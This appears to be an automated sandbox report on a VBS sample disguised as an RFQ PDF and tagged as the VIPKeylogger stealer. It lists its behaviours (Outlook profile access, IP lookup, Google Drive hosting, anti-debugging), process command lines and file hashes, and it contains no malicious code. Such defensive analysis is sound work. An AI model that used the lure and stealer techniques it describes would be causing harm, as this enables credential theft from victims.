Malware Analysis Report

2024-11-30 14:58

Sample ID 241030-g5gq6sybkn
Target Request For Quotation-RFQ097524_Pdf.vbs
SHA256 14eb913e7c5fe08f6c5f656178f35713b605f7d0aa1c62489b3cfaf418a0c27e
Tags vipkeylogger collection discovery keylogger stealer
Score 10/10

Analysis Overview

score
10/10

SHA256

14eb913e7c5fe08f6c5f656178f35713b605f7d0aa1c62489b3cfaf418a0c27e

Threat Level: Known bad

The file Request For Quotation-RFQ097524_Pdf.vbs was found to be: Known bad.

Malicious Activity Summary

vipkeylogger collection discovery keylogger stealer

Vipkeylogger family

VIPKeylogger

Blocklisted process makes network request

Checks computer location settings

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

System Location Discovery: System Language Discovery

Browser Information Discovery

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

outlook_win_path

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

outlook_office_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-30 06:23

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-30 06:23

Reported

2024-10-30 06:25

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

158s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request For Quotation-RFQ097524_Pdf.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Vipkeylogger family

vipkeylogger

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | checkip.dyndns.org | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

outlook_office_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A

outlook_win_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request For Quotation-RFQ097524_Pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network


Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r5c13izr.0o4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d336b18e0e02e045650ac4f24c7ecaa7
SHA1 87ce962bb3aa89fc06d5eb54f1a225ae76225b1c
SHA256 87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27
SHA512 e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18

C:\Users\Admin\AppData\Roaming\Bortelimeneres.Uds

MD5 b3d91ec6a3eb97821759453637c6c7ad
SHA1 471d11af010f2d40bd90d9744fe9d15d964645e4
SHA256 afb489226c47e56fdcebdba5d21447c4f5422ce541ce21c389d62fa8b9d5865e
SHA512 227586fd756d00597c50b7fb9891c35f68bcc15397cc161164fb37ee5a6d4c78e6361d3f053d4442e812e05f9e6913071b795a0ea063f7e1779b80852b80e333


Analysis: behavioral1

Detonation Overview

Submitted

2024-10-30 06:23

Reported

2024-10-30 06:25

Platform

win7-20240903-en

Max time kernel

150s

Max time network

122s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request For Quotation-RFQ097524_Pdf.vbs"

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request For Quotation-RFQ097524_Pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network

N/A

Files
